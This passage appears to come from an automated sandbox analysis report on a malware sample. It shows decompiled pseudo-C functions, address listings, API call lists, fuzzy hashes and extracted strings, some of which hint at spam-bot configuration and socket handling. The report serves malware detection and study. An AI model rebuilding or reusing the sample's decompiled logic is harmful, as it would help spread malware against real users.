							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x761b43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}















                                                                                                                                  0x0040e65a
                                                                                                                                  0x0040e664
                                                                                                                                  0x0040e666
                                                                                                                                  0x0040e66c
                                                                                                                                  0x0040e6a9
                                                                                                                                  0x0040e6b0
                                                                                                                                  0x0040e6b5
                                                                                                                                  0x0040e6c8
                                                                                                                                  0x0040e6d0
                                                                                                                                  0x0040e6d3
                                                                                                                                  0x0040e6d8
                                                                                                                                  0x0040e6de
                                                                                                                                  0x0040e6f5
                                                                                                                                  0x0040e6e0
                                                                                                                                  0x0040e6e5
                                                                                                                                  0x0040e6e9
                                                                                                                                  0x0040e6ef
                                                                                                                                  0x0040e6ef
                                                                                                                                  0x0040e6f9
                                                                                                                                  0x0040e6f9
                                                                                                                                  0x0040e6fe
                                                                                                                                  0x0040e704
                                                                                                                                  0x0040e741
                                                                                                                                  0x0040e743
                                                                                                                                  0x0040e6b9
                                                                                                                                  0x0040e6b9
                                                                                                                                  0x0040e6c4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e709
                                                                                                                                  0x0040e70b
                                                                                                                                  0x0040e70e
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e718
                                                                                                                                  0x0040e71b
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e732
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e736
                                                                                                                                  0x0040e722
                                                                                                                                  0x0040e728
                                                                                                                                  0x0040e72a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e72a
                                                                                                                                  0x0040e710
                                                                                                                                  0x0040e713
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e737
                                                                                                                                  0x0040e737
                                                                                                                                  0x0040e739
                                                                                                                                  0x0040e739
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e6b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e676
                                                                                                                                  0x0040e684
                                                                                                                                  0x0040e68f
                                                                                                                                  0x0040e699
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e69b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e69b
                                                                                                                                  0x0040e69d
                                                                                                                                  0x0040e69d
                                                                                                                                  0x0040e69f
                                                                                                                                  0x0040e6a1
                                                                                                                                  0x0040e6a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  • lstrcmpA.KERNEL32(761B43E8,00000000,?,761B43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,761B43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                                                                  • lstrcmpA.KERNEL32(?,00000008,?,761B43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                                                                  • String ID: A$ A
                                                                                                                                  • API String ID: 3343386518-686259309
                                                                                                                                  • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                                                                  • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                                                                  • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                                                                  • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040F26D Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                                                                  • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: setsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3981526788-0
                                                                                                                                  • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                                                                  • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                                                                  • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                                                                  • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402419 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}









                                                                                                                                  0x00402429
                                                                                                                                  0x0040242b
                                                                                                                                  0x0040242e
                                                                                                                                  0x00402434
                                                                                                                                  0x00402436
                                                                                                                                  0x0040243b
                                                                                                                                  0x00402474
                                                                                                                                  0x00402474
                                                                                                                                  0x0040243d
                                                                                                                                  0x0040243d
                                                                                                                                  0x00402440
                                                                                                                                  0x00402442
                                                                                                                                  0x00402446
                                                                                                                                  0x0040244c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040246b
                                                                                                                                  0x00402472
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402472
                                                                                                                                  0x0040247b
                                                                                                                                  0x0040247b
                                                                                                                                  0x00402476
                                                                                                                                  0x0040247a

                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcmpi
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 1808961391-1857712256
                                                                                                                                  • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                                                                  • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                                                                  • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                                                                  • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBCBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 125COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • wsprintfA.USER32 ref: 00ADBCEC
                                                                                                                                    • Part of subcall function 00ADADE8: lstrcpyn.KERNEL32(?,?,0000003E), ref: 00ADAE20
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTicklstrcpynwsprintf
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1085182253-3142137124
                                                                                                                                  • Opcode ID: 820597d01a9478628097e3db4953929dbabae1dcb8fbf00f62f3edaa8e401da7
                                                                                                                                  • Instruction ID: 32f9fdd1eb7b98c302d76a794c74a7ab41879371ef209cd7df9f89d290b4f05c
                                                                                                                                  • Opcode Fuzzy Hash: 820597d01a9478628097e3db4953929dbabae1dcb8fbf00f62f3edaa8e401da7
                                                                                                                                  • Instruction Fuzzy Hash: 87416671910248DFDF25DF54DC85AE93BB6EB08301F21405BFA6682261DB71DA81CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E52E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0040E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0040DD05();
				_t28 = E0040DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
					_t11 = E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t9);
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t17);
						_t40 = _t40 + 0x34;
					}
					E0040EE2A(_t31, 0x4122f8, 0, 0x100);
					E0040EE2A(_t31, 0x4128f8, 0, 0x100);
					E0040DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0040DB2E(_t20);
					_t23 =  *0x4136c4;
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							E00402544( *0x4136c4,  *0x4136c4, _v4, 0xe4, 0xc8);
							E0040E332(_t32, _t48,  *0x4136c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}
















                                                                                                                                  0x0040e52e
                                                                                                                                  0x0040e52e
                                                                                                                                  0x0040e533
                                                                                                                                  0x0040e544
                                                                                                                                  0x0040e54c
                                                                                                                                  0x0040e553
                                                                                                                                  0x0040e5b8
                                                                                                                                  0x0040e5c7
                                                                                                                                  0x0040e5ed
                                                                                                                                  0x0040e5f2
                                                                                                                                  0x0040e5f7
                                                                                                                                  0x0040e603
                                                                                                                                  0x0040e624
                                                                                                                                  0x0040e629
                                                                                                                                  0x0040e629
                                                                                                                                  0x0040e635
                                                                                                                                  0x0040e63e
                                                                                                                                  0x0040e646
                                                                                                                                  0x0040e653
                                                                                                                                  0x0040e653
                                                                                                                                  0x0040e558
                                                                                                                                  0x0040e55e
                                                                                                                                  0x0040e564
                                                                                                                                  0x0040e567
                                                                                                                                  0x0040e56c
                                                                                                                                  0x0040e571
                                                                                                                                  0x0040e574
                                                                                                                                  0x0040e578
                                                                                                                                  0x0040e583
                                                                                                                                  0x0040e589
                                                                                                                                  0x0040e58b
                                                                                                                                  0x0040e59a
                                                                                                                                  0x0040e5a9
                                                                                                                                  0x0040e5ae
                                                                                                                                  0x0040e5ae
                                                                                                                                  0x0040e58b
                                                                                                                                  0x0040e574
                                                                                                                                  0x0040e5b2
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,761B43E0,?,00000000,?,0040A445), ref: 0040E558
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,761B43E0,?,00000000,?,0040A445), ref: 0040E583
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,761B43E0,?,00000000,?,0040A445), ref: 0040E5B2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3683885500-2980165447
                                                                                                                                  • Opcode ID: 7ecd9c3cf8a4b361ad33475d59cc5a64982076f142c0ea8303aebe1deb81fc45
                                                                                                                                  • Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
                                                                                                                                  • Opcode Fuzzy Hash: 7ecd9c3cf8a4b361ad33475d59cc5a64982076f142c0ea8303aebe1deb81fc45
                                                                                                                                  • Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADE795 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00ADDF6C: GetCurrentThreadId.KERNEL32 ref: 00ADDFBA
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,00ADA6AC), ref: 00ADE7BF
                                                                                                                                  • ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,00ADA6AC), ref: 00ADE7EA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,00ADA6AC), ref: 00ADE819
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCurrentHandleReadSizeThread
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1396056608-2980165447
                                                                                                                                  • Opcode ID: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                                                                  • Instruction ID: 3d26e26e52633f4399125c5aa1647c2fe7d39c510be2adf003fbe8d832dcd45f
                                                                                                                                  • Opcode Fuzzy Hash: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                                                                  • Instruction Fuzzy Hash: 1D21A3B1A403007AE221B7219D47FAB3E5CDB65B60F140026BA0FA92D3FAA5995082F5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7E6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
                                                                                                                                  • Instruction ID: 509e828b3008e3aab81c55c070a8947765e217c103e4db72dccbab3868dfdeb3
                                                                                                                                  • Opcode Fuzzy Hash: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
                                                                                                                                  • Instruction Fuzzy Hash: 614125F0E001299FDB64CF49D881BAEB7B4FF85314F40419AE188AB240C7785E85CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
                                                                                                                                  • Instruction ID: d1c1bcbb0fab2d3620b9ffaf9ec68e89214f902ffa806ae79501c52aa73867b1
                                                                                                                                  • Opcode Fuzzy Hash: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
                                                                                                                                  • Instruction Fuzzy Hash: 304106F1E001299FEF64CF49D881BAEB7B5FB85314F4445AAE188AB241C7385E81CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D4BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
                                                                                                                                  • Instruction ID: 42106033806ea7bb90f00517d68dc85ba1b5828fe851184c900f6de1efba4c70
                                                                                                                                  • Opcode Fuzzy Hash: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
                                                                                                                                  • Instruction Fuzzy Hash: ED41E2B1E05629DFEB24CF58DC89BAEB7B5FB84304F64859AD049A7240C7789E80CF44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D46B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
                                                                                                                                  • Instruction ID: 6145f39c6fd3fe5de38c2efc57b572788e451d6dd513c70c114c2fbd8dd523f2
                                                                                                                                  • Opcode Fuzzy Hash: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
                                                                                                                                  • Instruction Fuzzy Hash: 2341E5B1E05228DFDB24CF58D889BAEB7B5BB85304F6481DAD009A7240C7789E80CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
                                                                                                                                  • Instruction ID: afea4893869f5e44770ec48f1c12b1aa2fdc6b311f9b05f0b74501ba197f70af
                                                                                                                                  • Opcode Fuzzy Hash: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
                                                                                                                                  • Instruction Fuzzy Hash: 8B4126F1E001299FDB64CF49D881BAEB7B4BB85314F4045DAE288A7201C7385E81CF1A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBC7A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocket
                                                                                                                                  • String ID: %FROM_EMAIL$0 v
                                                                                                                                  • API String ID: 1869671989-3573081871
                                                                                                                                  • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                                                                  • Instruction ID: 216c6e9fae9a8220cc2e9b20a11e458793e52aa6c0336acd06b959dc8a2ea281
                                                                                                                                  • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                                                                  • Instruction Fuzzy Hash: 05317A71910248DFDF25DFA4DC84AEA77B8EB48700F20456BFA2682261DB30DA85CF24
